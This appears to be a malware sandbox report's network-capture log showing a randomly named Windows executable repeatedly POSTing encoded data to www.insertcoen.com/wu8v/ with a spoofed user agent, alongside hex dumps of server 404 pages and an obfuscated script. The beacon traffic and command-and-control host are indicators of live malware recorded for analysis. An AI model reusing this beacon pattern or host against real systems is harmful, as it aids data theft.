                                                                                                                    Data Raw: 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <title>One moment, please...</title> <style> body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center; } </style> </head><body> <h1>Please wait while your request is being verified...</h1> <form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="GET"> <input type="hidden" id="wsidchk" name="wsidchk"/> </form> <script> (function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!! [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:08.388670921 CEST512INData Raw: 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20
                                                                                                                    Data Ascii: []+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener('DOMContentLoad


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    41192.168.2.44978462.149.128.40802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:14.370158911 CEST724OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.insertcoen.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.insertcoen.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.insertcoen.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 75 58 45 6a 6b 51 33 71 30 5a 58 77 31 6a 74 34 51 6e 33 58 48 74 43 32 52 61 38 47 33 2f 4d 42 68 62 72 68 2f 50 68 63 4c 67 50 76 70 6e 6b 65 34 57 70 61 48 70 61 61 6b 41 65 62 79 32 5a 65 2f 30 37 50 6d 74 6b 49 63 54 78 75 76 75 39 78 4a 47 53 6e 35 49 58 54 32 33 35 73 37 61 36 74 6b 49 31 50 32 75 4d 42 67 59 53 49 36 43 4b 42 67 66 4a 4a 68 66 64 4d 59 4a 4d 76 44 61 52 44 43 49 50 4c 78 34 39 74 76 49 37 2b 36 54 68 6c 36 77 73 62 72 71 69 6d 6c 44 69 57 79 47 58 48 4d 75 48 4c 6f 6b 39 39 32 47 6f 4f 31 5a 49 63 66 61 54 48 58 35 6b 68 5a 51 32 73 35 77 68 35 6b 41 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=uXEjkQ3q0ZXw1jt4Qn3XHtC2Ra8G3/MBhbrh/PhcLgPvpnke4WpaHpaakAeby2Ze/07PmtkIcTxuvu9xJGSn5IXT235s7a6tkI1P2uMBgYSI6CKBgfJJhfdMYJMvDaRDCIPLx49tvI7+6Thl6wsbrqimlDiWyGXHMuHLok992GoO1ZIcfaTHX5khZQ2s5wh5kA==
                                                                                                                    May 8, 2024 14:08:14.701770067 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Cache-Control: private
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:08:14 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 4947
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0; [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:14.701783895 CEST1289INData Raw: 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30
                                                                                                                    Data Ascii: :#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                                                                                                    May 8, 2024 14:08:14.701795101 CEST1289INData Raw: 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64 69 76
                                                                                                                    Data Ascii: :#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is tempor
                                                                                                                    May 8, 2024 14:08:14.701807022 CEST1289INData Raw: 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c
                                                                                                                    Data Ascii: Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></t
                                                                                                                    May 8, 2024 14:08:15.035562038 CEST9INData Raw: 3c 2f 68 74 6d 6c 3e 20 0a
                                                                                                                    Data Ascii: </html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    42192.168.2.44978562.149.128.40802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:17.238390923 CEST744OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.insertcoen.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.insertcoen.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.insertcoen.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 75 58 45 6a 6b 51 33 71 30 5a 58 77 33 44 39 34 44 48 4c 58 47 4e 43 31 4e 4b 38 47 39 66 4e 4b 68 62 33 68 2f 4f 31 71 4b 53 72 76 70 43 59 65 37 55 42 61 47 70 61 61 78 77 65 43 73 47 5a 4a 2f 30 6e 74 6d 70 67 49 63 53 52 75 76 76 74 78 4a 31 71 6f 34 59 58 52 37 58 35 79 31 36 36 74 6b 49 31 50 32 75 59 6e 67 59 61 49 36 79 36 42 68 2b 4a 4f 72 2f 64 50 51 70 4d 76 48 61 52 50 43 49 50 31 78 39 56 58 76 4e 2f 2b 36 58 6c 6c 36 69 55 59 38 36 69 67 37 7a 6a 41 69 6c 47 53 55 4f 2b 42 77 46 5a 4e 2b 58 67 4d 30 66 5a 47 4f 72 79 51 46 35 41 53 45 58 2f 59 30 7a 63 77 2f 4a 31 4a 77 48 49 68 73 4f 35 33 53 76 64 64 33 35 51 37 6b 76 4d 3d
                                                                                                                    Data Ascii: MdtlcTm=uXEjkQ3q0ZXw3D94DHLXGNC1NK8G9fNKhb3h/O1qKSrvpCYe7UBaGpaaxweCsGZJ/0ntmpgIcSRuvvtxJ1qo4YXR7X5y166tkI1P2uYngYaI6y6Bh+JOr/dPQpMvHaRPCIP1x9VXvN/+6Xll6iUY86ig7zjAilGSUO+BwFZN+XgM0fZGOryQF5ASEX/Y0zcw/J1JwHIhsO53Svdd35Q7kvM=
                                                                                                                    May 8, 2024 14:08:17.568908930 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Cache-Control: private
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:08:17 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 4947
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0; [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:17.568928003 CEST1289INData Raw: 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30
                                                                                                                    Data Ascii: :#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                                                                                                    May 8, 2024 14:08:17.568939924 CEST1289INData Raw: 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64 69 76
                                                                                                                    Data Ascii: :#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is tempor
                                                                                                                    May 8, 2024 14:08:17.568953037 CEST1289INData Raw: 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c
                                                                                                                    Data Ascii: Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></t
                                                                                                                    May 8, 2024 14:08:17.898473024 CEST9INData Raw: 3c 2f 68 74 6d 6c 3e 20 0a
                                                                                                                    Data Ascii: </html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    43192.168.2.44978662.149.128.40802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:20.099442005 CEST7734OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.insertcoen.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.insertcoen.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.insertcoen.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 75 58 45 6a 6b 51 33 71 30 5a 58 77 33 44 39 34 44 48 4c 58 47 4e 43 31 4e 4b 38 47 39 66 4e 4b 68 62 33 68 2f 4f 31 71 4b 53 6a 76 70 77 67 65 37 7a 64 61 46 70 61 61 77 77 65 48 73 47 59 4c 2f 30 2f 70 6d 70 73 2b 63 57 68 75 75 49 74 78 4c 45 71 6f 7a 59 58 52 6b 48 35 7a 37 61 36 43 6b 4c 4e 44 32 75 49 6e 67 59 61 49 36 30 2b 42 6c 76 4a 4f 34 76 64 4d 59 4a 4e 39 44 61 52 6a 43 49 33 44 78 39 51 67 75 35 4c 2b 36 7a 42 6c 38 58 34 59 2f 61 69 69 36 7a 6a 49 69 6c 4c 43 55 4f 69 6a 77 46 74 30 2b 58 6b 4d 33 34 59 44 54 34 57 74 57 37 49 67 65 57 71 38 34 42 4d 70 77 34 42 33 33 32 41 5a 30 39 46 42 5a 34 30 70 7a 71 34 77 35 62 78 67 68 57 52 59 42 77 78 69 6a 2b 61 6e 74 64 6a 68 74 48 4a 75 6e 37 6f 43 70 50 6e 4f 58 55 67 64 45 79 55 65 46 55 69 6b 36 4d 42 58 4d 43 39 63 32 32 71 4c 78 64 6f 67 35 55 74 30 71 34 37 58 49 56 2f 38 6e 70 30 50 42 30 2f 79 76 4b 55 62 6e 30 53 6a 30 44 4e 41 35 46 65 38 59 59 42 2b 74 79 57 78 33 75 75 47 70 73 4c 6f 6b 41 64 33 34 79 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=uXEjkQ3q0ZXw3D94DHLXGNC1NK8G9fNKhb3h/O1qKSjvpwge7zdaFpaawweHsGYL/0/pmps+cWhuuItxLEqozYXRkH5z7a6CkLND2uIngYaI60+BlvJO4vdMYJN9DaRjCI3Dx9Qgu5L+6zBl8X4Y/aii6zjIilLCUOijwFt0+XkM34YDT4WtW7IgeWq84BMpw4B332AZ09FBZ40pzq4w5bxghWRYBwxij+antdjhtHJun7oCpPnOXUgdEyUeFUik6MBXMC9c22qLxdog5Ut0q47XIV/8np0PB0/yvKUbn0Sj0DNA5Fe8YYB+tyWx3uuGpsLokAd34yMjyqZs54gaw1DsaonDjLUKvRYJgCjPUmHatTJy4rnZk6DBE1qCnQcizHn8LJK2dla08/BvNeh/QXW6vKbBKlufD6fL122hUfKezJYYV+oPisL05Iisfj7qWNTaQUP0ezial8vU05HKTZ3YoRdgxwidUJAJBgyBiBiQXIBiKzEA38l43VSA0MQLdvRpUd5Mld+DnEQcRYjggV8ugARUSXb8+169F62TIGeYbGCx3RGRw4qsn6ZLFvRf4N6S545meS1ZWDNYdG3AWXszvjyBTCzRfIrDm0AEHmQ8sxMIuX7EVpP3rIhG0jfTuZ+ukMTl0oGs4d1Ecx5HW/z97jxjVbNajmgrOP/KVMgBAF0gQJTG+G06+QzYEBADCXcdZ1rhZyiILM5REysD/tJNWiQ8BetQy1LtroTA78dRuhSmpYHNnhpdEx1WSoWLUiTnH8tXaFTL8TSS29ZC2IxDQSmARLLR4+jpFvHXhh+/dq+4aikSGHHLRnfUbx9KjcQQTazokL43x1+GUVBPCDjBspNMToPq6C0t5MQLyx1SdjyiaTxJ+HKamw2+E4SWZFbj5egUPHRVnEIZptQc2BWZfpvpyk5it5oBYWF4mm0BrZtDjTsyJDJ9FKuv73qDNbg7Ku/Gp7tQM59eytOQl3SIlCM4CUGKxSwOZl7uBTli [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:20.429464102 CEST3092OUTData Raw: 4a 72 68 65 4f 5a 4b 55 45 2b 37 70 6f 35 45 76 34 66 63 56 65 5a 4e 4c 65 69 45 37 33 2f 71 6b 54 51 63 7a 4f 43 61 70 31 78 56 73 78 4d 58 56 6e 2f 58 53 4d 62 66 53 4f 42 41 65 35 55 7a 4c 71 33 56 74 43 6d 71 42 61 37 31 64 69 6e 4b 76 6a 7a
                                                                                                                    Data Ascii: JrheOZKUE+7po5Ev4fcVeZNLeiE73/qkTQczOCap1xVsxMXVn/XSMbfSOBAe5UzLq3VtCmqBa71dinKvjzT7CVKSwMjqlDaFRAZTmIV1DbBnHLnic+OL1kCYa24ESUvUX8XaD3nNN7TuovM+fZ8FlQI11l8VgLsi80+r8mX8PrmQcwpMxQn/i8vWKJzIMu7f3c5j93IeBfnvQt4Q1Xql+eI9mEOkAwSeYVs4X1lSoKr3NLQC4EE
                                                                                                                    May 8, 2024 14:08:20.761182070 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Cache-Control: private
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:08:20 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 4947
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0; [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:20.761195898 CEST1289INData Raw: 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30
                                                                                                                    Data Ascii: :#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                                                                                                    May 8, 2024 14:08:20.761214972 CEST1289INData Raw: 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64 69 76
